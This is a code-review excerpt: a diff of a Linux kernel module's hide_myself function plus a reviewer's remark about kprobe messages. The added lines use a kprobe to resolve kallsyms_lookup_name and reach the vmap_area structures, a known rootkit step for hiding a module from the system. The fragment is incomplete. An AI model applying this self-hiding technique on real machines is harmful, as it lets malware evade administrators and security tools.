main.c

```diff
@@ -11,10 +20,21 @@ static void __init hide_myself(void)
 {
     struct vmap_area *va, *vtmp;
     struct module_use *use, *tmp;
+    struct list_head *_vmap_area_list;
+    struct rb_root *_vmap_area_root;
+
+#ifdef KPROBE_LOOKUP
+    unsigned long (*kallsyms_lookup_name)(const char *name);
+    register_kprobe(&kp);
+    kallsyms_lookup_name = ( unsigned long(*)(const char *name) )kp.addr;
+    printk("kprobe find the kallsyms_lookup_name\n ");
```

Comment:
The messages about Kprobes are not necessary. You only have to exit when failure.